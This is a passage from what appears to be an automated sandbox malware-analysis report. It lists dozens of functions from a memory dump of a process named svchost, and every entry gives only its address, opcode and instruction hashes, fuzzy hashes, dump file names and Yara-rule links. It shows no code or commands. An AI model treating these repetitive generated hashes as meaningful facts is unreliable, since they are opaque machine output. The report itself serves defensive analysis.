                                                                    • Instruction ID: 32e3ef392246cd0e645b93adb5d14338b3fb55a86cf6a5c5b105b18277555d40
                                                                    • Opcode Fuzzy Hash: 0e31fe97e8f6e5179ac03a79477459e1ca552eb1ff42c15d950e03935ac15d1b
                                                                    • Instruction Fuzzy Hash: 41900231645804129580B15848C5547400697E0301B95D051E48A4558C8A248A569361
                                                                    Function 02E74650 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe147637d0bad5023d30332fc6b1cf2a353298f6e8c6850ce61abbd061516e9c
                                                                    • Instruction ID: 46228951cf1429c9cb4b002c633ff36a128d824f80089a519d29984c2f864f3b
                                                                    • Opcode Fuzzy Hash: fe147637d0bad5023d30332fc6b1cf2a353298f6e8c6850ce61abbd061516e9c
                                                                    • Instruction Fuzzy Hash: 31900271641504424580B1584845407600697E13013D5D155A49D4564C86288955D269
                                                                    Function 02E72AF0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe2a46542b31c696b0a6d77df9b142bb0f544820ca5ae4df313610c1cf842666
                                                                    • Instruction ID: 7a912fb60bbdc89c80216f87790969989a1d9a3565b926bb971580b7335cc259
                                                                    • Opcode Fuzzy Hash: fe2a46542b31c696b0a6d77df9b142bb0f544820ca5ae4df313610c1cf842666
                                                                    • Instruction Fuzzy Hash: 93900235261404020585F558064550B044697D63513D5D055F5896594CC63189659321
                                                                    Function 02E72AD0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00faa53d2ac9d1a210d8b7cd240f6e7bb4e64a7a2a8e05fe59c5301165ce99cb
                                                                    • Instruction ID: 3505a1b53705378d792bed8161618fd8a4a5251be36cfdff2662d5e53e038f71
                                                                    • Opcode Fuzzy Hash: 00faa53d2ac9d1a210d8b7cd240f6e7bb4e64a7a2a8e05fe59c5301165ce99cb
                                                                    • Instruction Fuzzy Hash: FA900435351404030545F55C07455070047C7D53513D5D071F54D5554CD731CD71D131
                                                                    Function 02E72AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 084f201b553523b6880cde6c3f342754e1f58da9bee3542773e27e055704f36f
                                                                    • Instruction ID: b1160f4d3994ad99695c727b416888e524bf7a22922273cdb73adc5341e28b28
                                                                    • Opcode Fuzzy Hash: 084f201b553523b6880cde6c3f342754e1f58da9bee3542773e27e055704f36f
                                                                    • Instruction Fuzzy Hash: AF9002B1241544924940F2588445B0B450687E0301B95D056E54D4564CC5358951D135
                                                                    Function 02E72BE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b38f04f06957f53ef6509d2f068825222e3f0c8ab6367677a8518f9924d2a67
                                                                    • Instruction ID: e3fecaf9e9f873430e0fe29b922661ebc5041590a4a6efeb497f99313c781198
                                                                    • Opcode Fuzzy Hash: 6b38f04f06957f53ef6509d2f068825222e3f0c8ab6367677a8518f9924d2a67
                                                                    • Instruction Fuzzy Hash: 0390023124544C42D580B1584445A47001687D0305F95D051A44E4698D96358E55F661
                                                                    Function 02E72BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cec2e3a60b8ca126a3cd23bc92e802ca1b87715818f3e40473dc430ab7f61201
                                                                    • Instruction ID: 17833120237f1efd5ba9210ded04b2b77a645a3852ceb9225b864701096c2a6d
                                                                    • Opcode Fuzzy Hash: cec2e3a60b8ca126a3cd23bc92e802ca1b87715818f3e40473dc430ab7f61201
                                                                    • Instruction Fuzzy Hash: CE90023124140C02D5C0B158444564B000687D1301FD5D055A44A5658DCA258B59B7A1
                                                                    Function 02E72BA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e3e940e6960d6c351f492fea34f6822112691dc650c527eeeb93932e96afcd7
                                                                    • Instruction ID: 99704e71e7916f56457ce48ba5e461f608c64c10e270cf8c919b7be91eb19899
                                                                    • Opcode Fuzzy Hash: 5e3e940e6960d6c351f492fea34f6822112691dc650c527eeeb93932e96afcd7
                                                                    • Instruction Fuzzy Hash: 9490023164540C02D590B1584455747000687D0301F95D051A44A4658D87658B55B6A1
                                                                    Function 02E72B80 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 286adf02c0fa20e1a70fcb0a2185070e19030d6e0b1c26ed4681bcb4f7036514
                                                                    • Instruction ID: 50f0703a2857f11ce82b9562764de21e7fc6f2624bec436d485096a78213406e
                                                                    • Opcode Fuzzy Hash: 286adf02c0fa20e1a70fcb0a2185070e19030d6e0b1c26ed4681bcb4f7036514
                                                                    • Instruction Fuzzy Hash: 7890023124140C02D544B1584845687000687D0301F95D051AA4A4659E96758991B131
                                                                    Function 02E72EE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c919f808b98ee3790bf3e76bf5c50d3e2db60a2df26cb44d1d235810ea332249
                                                                    • Instruction ID: 42a13f381b9db3553e191e122675199170bf41f7911341f8bc5bb0709b8ae1ee
                                                                    • Opcode Fuzzy Hash: c919f808b98ee3790bf3e76bf5c50d3e2db60a2df26cb44d1d235810ea332249
                                                                    • Instruction Fuzzy Hash: ED90027124180803D580B5584845607000687D0302F95D051A64E4559E8A398D51A135
                                                                    Function 02E72EA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2180f589396b34569b08e319d4dd2269c4091aad90f29defeae03f7d29f7b261
                                                                    • Instruction ID: 15d84f0a9778d54dcbd78a151c4cb479ae79894ea73ae4188cf9042b3b12c521
                                                                    • Opcode Fuzzy Hash: 2180f589396b34569b08e319d4dd2269c4091aad90f29defeae03f7d29f7b261
                                                                    • Instruction Fuzzy Hash: A290027124140802D580B1584445747000687D0301F95D051A94E4558E86698ED5A665
                                                                    Function 02E72E80 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bfa9b0d0f1b2f23cd939fc55ea3f6e4bfb60791d37c263485117495c3cc80348
                                                                    • Instruction ID: ea1c73c9603ff0b066fa7c7f2d6cf7fd071ea66657571e50e74b140cca95986b
                                                                    • Opcode Fuzzy Hash: bfa9b0d0f1b2f23cd939fc55ea3f6e4bfb60791d37c263485117495c3cc80348
                                                                    • Instruction Fuzzy Hash: 0A90023164140902D541B1584445617000B87D0341FD5D062A54A4559ECA358A92E131
                                                                    Function 02E72E30 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6618a977c3d137c293353346539855ed1166d5e2222734f13b3864cab25e66f
                                                                    • Instruction ID: 600f15569191b79578a31b699fdedfe06c6cd9e6ac9ee0c54e6a92ea94372839
                                                                    • Opcode Fuzzy Hash: a6618a977c3d137c293353346539855ed1166d5e2222734f13b3864cab25e66f
                                                                    • Instruction Fuzzy Hash: 3390023134140802D542B1584455607000AC7D1345FD5D052E58A4559D86358A53E132
                                                                    Function 02E72FE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14fd6b2d0a02cf0f70c4f1f631bc8faadfd28341b934c84450db85049680a92a
                                                                    • Instruction ID: 32f4956a30ef86e91bd923e267f2288ec572ad6b69c17a3f8448a313ac50ca42
                                                                    • Opcode Fuzzy Hash: 14fd6b2d0a02cf0f70c4f1f631bc8faadfd28341b934c84450db85049680a92a
                                                                    • Instruction Fuzzy Hash: A4900231251C0442D640B5684C55B07000687D0303F95D155A45D4558CC92589619521
                                                                    Function 02E72FA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dfc1b2162786ef7f5d62f9bc15ae4757d1872f7bcfba6e7133d81680e176e6ea
                                                                    • Instruction ID: fbc489d7af9ef1343c8cba3a503cae77115b8854e7f99aa1f09855e2134abcc0
                                                                    • Opcode Fuzzy Hash: dfc1b2162786ef7f5d62f9bc15ae4757d1872f7bcfba6e7133d81680e176e6ea
                                                                    • Instruction Fuzzy Hash: 1B90023124180802D540B1584849747000687D0302F95D051A95E4559E8675C991A531
                                                                    Function 02E72FB0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad8c88d9bd85f9f7db8298d1d551b8fbc80b07e55ea46151b9733518a73f9a71
                                                                    • Instruction ID: fd34d389f7a954fed81fd4c0d8e4c9e30c0362f8d4158049d4ca80e8f7bfb5d7
                                                                    • Opcode Fuzzy Hash: ad8c88d9bd85f9f7db8298d1d551b8fbc80b07e55ea46151b9733518a73f9a71
                                                                    • Instruction Fuzzy Hash: 5C900231641404424580B16888859074006ABE1311795D161A4DD8554D856989659665
                                                                    Function 02E72F90 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cc13b3c0eb18b7d28fd48c1490a534b9884702bc82c7c5770ed442c7c3fb6d2
                                                                    • Instruction ID: 3384d08d399bd7c076aa24cc84109a7423b4bd616ecf40208714d4ecf2d804ab
                                                                    • Opcode Fuzzy Hash: 8cc13b3c0eb18b7d28fd48c1490a534b9884702bc82c7c5770ed442c7c3fb6d2
                                                                    • Instruction Fuzzy Hash: 4390023124180802D540B158485570B000687D0302F95D051A55E4559D86358951A571
                                                                    Function 02E72F60 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a331d67ef7de3f05d2a54eb0c231c9dc888c32df26b61c89976c4d59de63b48c
                                                                    • Instruction ID: 3a8e445074ae930b2494d9aca0ba5d63d6420294f0263ac023216f46fb408663
                                                                    • Opcode Fuzzy Hash: a331d67ef7de3f05d2a54eb0c231c9dc888c32df26b61c89976c4d59de63b48c
                                                                    • Instruction Fuzzy Hash: CC90027125140442D544B1584445707004687E1301F95D052A65D4558CC5398D619125
                                                                    Function 02E72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce5620094bea95652b6ce8856a9316e54af8a5b8c2c1a8c12da089bce732ae7d
                                                                    • Instruction ID: 6f8ed8c810d007b3cd7f91f1c90b3ad9472fd707955ef48750f3acf958cba2fc
                                                                    • Opcode Fuzzy Hash: ce5620094bea95652b6ce8856a9316e54af8a5b8c2c1a8c12da089bce732ae7d
                                                                    • Instruction Fuzzy Hash: 4690027138140842D540B1584455B070006C7E1301F95D055E54E4558D8629CD52A126
                                                                    Function 02E72CF0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18e541a21ea3ce937743921de65d63a9fd3998928404f878f1662c0cfb3d4317
                                                                    • Instruction ID: fb7a17f837f9be7318b37edbb40eebe06527a1738f1e7617584f6715be11a726
                                                                    • Opcode Fuzzy Hash: 18e541a21ea3ce937743921de65d63a9fd3998928404f878f1662c0cfb3d4317
                                                                    • Instruction Fuzzy Hash: DC90023124140803D540B1585549707000687D0301F95E451A48A455CDD6668951A121
                                                                    Function 02E72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae6e32deb61cd036a4700afb5bb1c71ed3eef834e9a496c46f501b7605326d94
                                                                    • Instruction ID: 53aa46231820b1e238af960a335a8302bf6872374f7dff4608030bd0e1ba941f
                                                                    • Opcode Fuzzy Hash: ae6e32deb61cd036a4700afb5bb1c71ed3eef834e9a496c46f501b7605326d94
                                                                    • Instruction Fuzzy Hash: 4790023164540802D580B1585459707001687D0301F95E051A44A4558DC6698B55A6A1
                                                                    Function 02E72CA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2bb9c3e3954afc2b604e7c456a0a0eba132736ef78082ded0cebbe2a70e358c
                                                                    • Instruction ID: 525ca0f9c036b41c05c266604e829ca7ad49e93281848cdc6438eac5bba77fea
                                                                    • Opcode Fuzzy Hash: c2bb9c3e3954afc2b604e7c456a0a0eba132736ef78082ded0cebbe2a70e358c
                                                                    • Instruction Fuzzy Hash: 7690023124140802D540B5985449647000687E0301F95E051A94A4559EC6758991A131
                                                                    Function 02E72C60 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5cd286c10dbada5f919b012723d670bf353e00c8d6d75838670aaf80c988c7d4
                                                                    • Instruction ID: 96463ea1c6f456fe25634eb9f8b455ccfe88fe111957b245fe7349c0e249db32
                                                                    • Opcode Fuzzy Hash: 5cd286c10dbada5f919b012723d670bf353e00c8d6d75838670aaf80c988c7d4
                                                                    • Instruction Fuzzy Hash: 1790023124140C42D540B1584445B47000687E0301F95D056A45A4658D8625C951B521
                                                                    Function 02E72C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a550bedb60c372ab06ec555d2cabf21798103b0df057e13d51aad7a5d0ca25bf
                                                                    • Instruction ID: 8dda0f8b76e29c3980ba4c205db6f15a1fdbb22088eb41b084a3338c299f6e4d
                                                                    • Opcode Fuzzy Hash: a550bedb60c372ab06ec555d2cabf21798103b0df057e13d51aad7a5d0ca25bf
                                                                    • Instruction Fuzzy Hash: 3F90023124148C02D550B158844574B000687D0301F99D451A88A465CD86A58991B121
                                                                    Function 02E72DD0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eced3314379da6715fec14317b51772485697d6b52d4ff6646534a0be1e9d35c
                                                                    • Instruction ID: 79e8646f4a8390e89e5774684902135a953d78d46d44a91ff2e28cb789b8c9b4
                                                                    • Opcode Fuzzy Hash: eced3314379da6715fec14317b51772485697d6b52d4ff6646534a0be1e9d35c
                                                                    • Instruction Fuzzy Hash: 98900231282445525985F1584445507400797E03417D5D052A5894954C85369956D621
                                                                    Function 02E72DB0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef769a11e3e44b8e5bb82c12025055a06fb48edcb56477c97d382ff402ab6789
                                                                    • Instruction ID: c01a245a86828ad7152d1ce027cf41182bde78f66d39948dfacc52cb4749dfeb
                                                                    • Opcode Fuzzy Hash: ef769a11e3e44b8e5bb82c12025055a06fb48edcb56477c97d382ff402ab6789
                                                                    • Instruction Fuzzy Hash: EB90023128140802D581B1584445607000A97D0341FD5D052A48A4558E86658B56EA61
                                                                    Function 02E72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55dccbd7fc32f5d4659202c3eefdd78a9b9563b9854b3217f94c05090a8761aa
                                                                    • Instruction ID: 99d337e5690b889a094f55ba1640743d11bb8b788418a7c4ff5cc18f93e9f723
                                                                    • Opcode Fuzzy Hash: 55dccbd7fc32f5d4659202c3eefdd78a9b9563b9854b3217f94c05090a8761aa
                                                                    • Instruction Fuzzy Hash: 6890023134140403D580B15854596074006D7E1301F95E051E4894558CD92589569222
                                                                    Function 02E72D00 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cadce423721745d102fc166389027a394ec8ef6c79d304d91112eb4d1e28e7f0
                                                                    • Instruction ID: 2ebdddbbde4f397fd5314f511904c0adb374423ec8e6743459ce68004bb41e61
                                                                    • Opcode Fuzzy Hash: cadce423721745d102fc166389027a394ec8ef6c79d304d91112eb4d1e28e7f0
                                                                    • Instruction Fuzzy Hash: 2490023124544842D540B5585449A07000687D0305F95E051A54E4599DC6358951E131
                                                                    Function 02E72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b00c8a021999844e8ed0f2ddc3aebb6b8f72eb9a20222f543cf510b9c973e6f
                                                                    • Instruction ID: a4f71435f55d51a8797371bd426e48d79fc96809d9b1efc9a04734a4f1f4b022
                                                                    • Opcode Fuzzy Hash: 8b00c8a021999844e8ed0f2ddc3aebb6b8f72eb9a20222f543cf510b9c973e6f
                                                                    • Instruction Fuzzy Hash: A190023925340402D5C0B158544960B000687D1302FD5E455A449555CCC92589699321
                                                                    Function 02E73090 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8fd39e2806af0c414d3ff3b49d42f8fd97662a01d008a9e2ccecb93355033839
                                                                    • Instruction ID: 53dbfe358c8d1118962ed07939d17b62557844e31f95fd8530da4414063a4e4a
                                                                    • Opcode Fuzzy Hash: 8fd39e2806af0c414d3ff3b49d42f8fd97662a01d008a9e2ccecb93355033839
                                                                    • Instruction Fuzzy Hash: A990023128140C02D580B15884557070007C7D0701F95D051A44A4558D86268A65A6B1
                                                                    Function 02E73010 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e026043cd28c5564141d6e3632112f8c04c83b39f3aba1e9c63a904feb081847
                                                                    • Instruction ID: 3fdd75cf6b610bf871aa6ded493e6b33594630dd84b0a708f94d9ba3ad128bf7
                                                                    • Opcode Fuzzy Hash: e026043cd28c5564141d6e3632112f8c04c83b39f3aba1e9c63a904feb081847
                                                                    • Instruction Fuzzy Hash: 3A90023124184842D580B2584845B0F410687E1302FD5D059A85D6558CC92589559721
                                                                    Function 02E739B0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d5e292adb557a9f72241fabd9eb4df563a1e2ea72c4c7591c474f86376dcd12
                                                                    • Instruction ID: 03cfbda01c75e5fbaecf77b3cc98e514a81f73d9f6509f034d262dda170a3660
                                                                    • Opcode Fuzzy Hash: 1d5e292adb557a9f72241fabd9eb4df563a1e2ea72c4c7591c474f86376dcd12
                                                                    • Instruction Fuzzy Hash: 3790023128545502D590B15C44456174006A7E0301F95D061A4C94598D85658955A221
                                                                    Function 02E72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
